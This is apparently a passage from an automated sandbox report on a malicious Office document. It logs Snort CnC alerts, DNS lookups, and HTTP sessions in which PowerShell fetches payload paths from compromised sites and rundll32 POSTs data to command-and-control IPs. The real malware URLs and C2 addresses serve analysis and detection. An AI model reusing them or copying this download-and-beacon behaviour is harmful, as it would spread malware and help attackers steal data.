                                                                Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 71 94 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 df 75 01 00 62 7f 00 00 62 7f 00 00 71 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                                Stream Path: office, File Type: data, Stream Size: 3600
                                                                General
                                                                Stream Path:office
                                                                File Type:data
                                                                Stream Size:3600
                                                                Entropy:7.95165191987
                                                                Base64 Encoded:False
                                                                Data ASCII:E . . H . . v . @ . { . = ? . l % . . . . . . . . M . . | . . . . g w } . . t . T . . p a . H I . . . . I 0 . . V c _ = . . 6 ~ . . . . . G . . . + . . . F D . . u . . . 5 . . w . & e ' 7 . s . ~ . . . r . f V G H . p . ; . . n 8 . . . . . . T ^ . = v Y . L A . . . . . . . , . . x : . z . F . . . z . . . . . . o E . . . . $ . 3 m . u . . w . . . . . . . . . . Z . . + , . . U ~ . ; . . . . . . F . . C X M . . . ` . . G . : ! . . . Q w . . . ' % < s L . . . . Q b O y . N . . _ 7 . . 6 . . . . h . . v @ .
                                                                Data Raw:45 0d 09 48 8a d3 76 b2 40 dc 7b db 3d 3f c5 6c 25 05 d7 14 0b 83 b6 a5 e8 4d bf 95 7c c2 0f df db 67 77 7d c8 87 74 ab 54 ff fc 70 61 f7 48 49 ae f9 e6 d9 49 30 f0 c1 56 63 5f 3d 14 e0 36 7e cd 9c ff d5 c7 47 a3 9e 90 2b c0 0b 86 46 44 f1 04 75 e7 82 dc 35 95 aa 77 b5 26 65 27 37 97 73 c9 7e a3 c4 f8 72 81 66 56 47 48 1d 70 e5 3b 10 1e 6e 38 9e f9 b3 a2 97 07 54 5e 11 20 3d 76 59

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                01/26/21-10:49:16.398561TCP2404322ET CNC Feodo Tracker Reported CnC Server TCP group 124917480192.168.2.22190.55.186.229
                                                                01/26/21-10:49:29.348533TCP2404326ET CNC Feodo Tracker Reported CnC Server TCP group 14491757080192.168.2.22203.157.152.9
                                                                01/26/21-10:49:35.770683TCP2404308ET CNC Feodo Tracker Reported CnC Server TCP group 549176443192.168.2.22157.245.145.87
                                                                01/26/21-10:49:41.963049TCP2404306ET CNC Feodo Tracker Reported CnC Server TCP group 44917780192.168.2.22132.248.38.158
                                                                01/26/21-10:50:02.322084TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 2491798080192.168.2.22110.172.180.180

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 26, 2021 10:49:02.171469927 CET4916780192.168.2.22172.217.6.174
                                                                Jan 26, 2021 10:49:02.325359106 CET8049167172.217.6.174192.168.2.22
                                                                Jan 26, 2021 10:49:02.325505972 CET4916780192.168.2.22172.217.6.174
                                                                Jan 26, 2021 10:49:02.327931881 CET4916780192.168.2.22172.217.6.174
                                                                Jan 26, 2021 10:49:02.481794119 CET8049167172.217.6.174192.168.2.22
                                                                Jan 26, 2021 10:49:02.481854916 CET8049167172.217.6.174192.168.2.22
                                                                Jan 26, 2021 10:49:02.481887102 CET8049167172.217.6.174192.168.2.22
                                                                Jan 26, 2021 10:49:02.481976986 CET4916780192.168.2.22172.217.6.174
                                                                Jan 26, 2021 10:49:02.561449051 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:02.601639986 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:02.601794004 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:02.611016989 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:02.651180029 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:02.659581900 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:02.659636974 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:02.659801006 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:02.674685001 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:02.715013027 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:02.715092897 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:02.925832987 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:02.962780952 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:02.962919950 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:02.968161106 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:03.008373022 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.031749010 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.031810045 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.031852961 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.031878948 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.031917095 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.031944990 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.031980991 CET44349168104.21.88.166192.168.2.22
                                                                Jan 26, 2021 10:49:03.032011032 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:03.032067060 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:03.032073021 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:03.111203909 CET4916980192.168.2.2245.138.97.75
                                                                Jan 26, 2021 10:49:03.151880980 CET804916945.138.97.75192.168.2.22
                                                                Jan 26, 2021 10:49:03.152050972 CET4916980192.168.2.2245.138.97.75
                                                                Jan 26, 2021 10:49:03.152278900 CET4916980192.168.2.2245.138.97.75
                                                                Jan 26, 2021 10:49:03.193526983 CET804916945.138.97.75192.168.2.22
                                                                Jan 26, 2021 10:49:03.200124025 CET804916945.138.97.75192.168.2.22
                                                                Jan 26, 2021 10:49:03.237916946 CET49168443192.168.2.22104.21.88.166
                                                                Jan 26, 2021 10:49:03.271044016 CET4917080192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.316962957 CET8049170212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.317065001 CET4917080192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.317182064 CET4917080192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.363555908 CET8049170212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.393999100 CET4916980192.168.2.2245.138.97.75
                                                                Jan 26, 2021 10:49:03.405802965 CET8049170212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.470871925 CET49171443192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.515533924 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.515718937 CET49171443192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.516303062 CET49171443192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.561403036 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.562882900 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.562944889 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.562979937 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.563055038 CET49171443192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.578593969 CET49171443192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.612267017 CET4917080192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.623680115 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.642278910 CET49171443192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.650773048 CET8049170212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.650863886 CET4917080192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.726824045 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.743954897 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.744012117 CET44349171212.227.200.73192.168.2.22
                                                                Jan 26, 2021 10:49:03.744117975 CET49171443192.168.2.22212.227.200.73
                                                                Jan 26, 2021 10:49:03.814774036 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:03.854526997 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:03.854697943 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:03.855214119 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:03.894953966 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:03.895025015 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:03.895085096 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:03.895138025 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:03.895175934 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:03.895201921 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:03.895256996 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:03.895838976 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:03.911807060 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:03.951952934 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:04.158390045 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:04.198831081 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:04.198945045 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:04.829884052 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:04.913119078 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.133758068 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.133861065 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.133924961 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.133991003 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.134052992 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.134115934 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.134179115 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.134282112 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.134491920 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:05.136676073 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.136727095 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.137010098 CET49172443192.168.2.22192.0.78.20
                                                                Jan 26, 2021 10:49:05.139815092 CET44349172192.0.78.20192.168.2.22
                                                                Jan 26, 2021 10:49:05.139856100 CET44349172192.0.78.20192.168.2.22

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 26, 2021 10:49:02.104759932 CET5219753192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:02.162194014 CET53521978.8.8.8192.168.2.22
                                                                Jan 26, 2021 10:49:02.504286051 CET5309953192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:02.560549974 CET53530998.8.8.8192.168.2.22
                                                                Jan 26, 2021 10:49:03.049521923 CET5283853192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:03.110487938 CET53528388.8.8.8192.168.2.22
                                                                Jan 26, 2021 10:49:03.213757992 CET6120053192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:03.270020008 CET53612008.8.8.8192.168.2.22
                                                                Jan 26, 2021 10:49:03.413027048 CET4954853192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:03.469562054 CET53495488.8.8.8192.168.2.22
                                                                Jan 26, 2021 10:49:03.754988909 CET5562753192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:03.813617945 CET53556278.8.8.8192.168.2.22
                                                                Jan 26, 2021 10:49:04.110269070 CET5600953192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:04.158539057 CET53560098.8.8.8192.168.2.22
                                                                Jan 26, 2021 10:49:04.164685965 CET6186553192.168.2.228.8.8.8
                                                                Jan 26, 2021 10:49:04.222173929 CET53618658.8.8.8192.168.2.22

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Jan 26, 2021 10:49:02.104759932 CET192.168.2.228.8.8.80x3714Standard query (0)nightlifemumbai.clubA (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:02.504286051 CET192.168.2.228.8.8.80x24c2Standard query (0)shop.nowfal.devA (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.049521923 CET192.168.2.228.8.8.80x758fStandard query (0)e-wdesign.euA (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.213757992 CET192.168.2.228.8.8.80xf75cStandard query (0)traumfrauen-ukraine.deA (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.413027048 CET192.168.2.228.8.8.80xa343Standard query (0)traumfrauen-ukraine.deA (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.754988909 CET192.168.2.228.8.8.80xe5d1Standard query (0)jflmktg.wpcomstaging.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Jan 26, 2021 10:49:02.162194014 CET8.8.8.8192.168.2.220x3714No error (0)nightlifemumbai.club172.217.6.174A (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:02.560549974 CET8.8.8.8192.168.2.220x24c2No error (0)shop.nowfal.dev104.21.88.166A (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:02.560549974 CET8.8.8.8192.168.2.220x24c2No error (0)shop.nowfal.dev172.67.151.106A (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.110487938 CET8.8.8.8192.168.2.220x758fNo error (0)e-wdesign.eu45.138.97.75A (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.270020008 CET8.8.8.8192.168.2.220xf75cNo error (0)traumfrauen-ukraine.de212.227.200.73A (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.469562054 CET8.8.8.8192.168.2.220xa343No error (0)traumfrauen-ukraine.de212.227.200.73A (IP address)IN (0x0001)
                                                                Jan 26, 2021 10:49:03.813617945 CET8.8.8.8192.168.2.220xe5d1No error (0)jflmktg.wpcomstaging.com192.0.78.20A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • nightlifemumbai.club
                                                                • e-wdesign.eu
                                                                • traumfrauen-ukraine.de
                                                                • 203.157.152.9
                                                                  • 203.157.152.9:7080
                                                                • 157.245.145.87
                                                                  • 157.245.145.87:443

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.2249167172.217.6.17480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 26, 2021 10:49:02.327931881 CET0OUTGET /x/0wBD3/ HTTP/1.1
                                                                Host: nightlifemumbai.club
                                                                Connection: Keep-Alive
                                                                Jan 26, 2021 10:49:02.481854916 CET1INHTTP/1.1 404 Not Found
                                                                Content-Type: text/html; charset=UTF-8
                                                                Referrer-Policy: no-referrer
                                                                Content-Length: 1569
                                                                Date: Tue, 26 Jan 2021 09:49:02 GMT
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.224916945.138.97.7580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 26, 2021 10:49:03.152278900 CET12OUTGET /wp-content/bn1IgDejh/ HTTP/1.1
                                                                Host: e-wdesign.eu
                                                                Connection: Keep-Alive
                                                                Jan 26, 2021 10:49:03.200124025 CET13INHTTP/1.1 404 Not Found
                                                                Date: Tue, 26 Jan 2021 09:49:03 GMT
                                                                Server: Apache
                                                                Content-Length: 315
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.2249170212.227.200.7380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 26, 2021 10:49:03.317182064 CET13OUTGET /bin/JyeS/ HTTP/1.1
                                                                Host: traumfrauen-ukraine.de
                                                                Connection: Keep-Alive
                                                                Jan 26, 2021 10:49:03.405802965 CET14INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Tue, 26 Jan 2021 09:48:54 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.14
                                                                P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Pragma: no-cache
                                                                Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=a9tvcg65pn3j8tenk2k72rfcr5; path=/; secure; HttpOnly
                                                                X-Content-Type-Options: nosniff
                                                                Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                Last-Modified: Tue, 26 Jan 2021 09:48:54 GMT
                                                                X-Powered-By: PleskLin
                                                                Jan 26, 2021 10:49:03.650773048 CET19INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Tue, 26 Jan 2021 09:48:54 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.14
                                                                P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Pragma: no-cache
                                                                Set-Cookie: 4bf06e271745b22ffd3a18c8d5fc8b33=a9tvcg65pn3j8tenk2k72rfcr5; path=/; secure; HttpOnly
                                                                X-Content-Type-Options: nosniff
                                                                Location: https://traumfrauen-ukraine.de/bin/JyeS/
                                                                Last-Modified: Tue, 26 Jan 2021 09:48:54 GMT
                                                                X-Powered-By: PleskLin


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.2249175203.157.152.97080C:\Windows\SysWOW64\rundll32.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 26, 2021 10:49:29.600352049 CET741OUTPOST /fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/ HTTP/1.1
                                                                DNT: 0
                                                                Referer: 203.157.152.9/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/
                                                                Content-Type: multipart/form-data; boundary=--------------------cs4PSNdop4ezuJ7KDL7q
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 203.157.152.9:7080
                                                                Content-Length: 6292
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jan 26, 2021 10:49:30.774895906 CET748INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Tue, 26 Jan 2021 09:49:30 GMT
                                                                Content-Type: test/html; charset=UTF-8
                                                                Content-Length: 0
                                                                Connection: keep-alive
                                                                vary: Accept-Encoding


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.2249176157.245.145.87443C:\Windows\SysWOW64\rundll32.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 26, 2021 10:49:35.986354113 CET749OUTPOST /gjk3j942rq/3t3141347sxz/js59r1n8zph/ HTTP/1.1
                                                                DNT: 0
                                                                Referer: 157.245.145.87/gjk3j942rq/3t3141347sxz/js59r1n8zph/
                                                                Content-Type: multipart/form-data; boundary=--------------dFTqLeLs5G7gBB
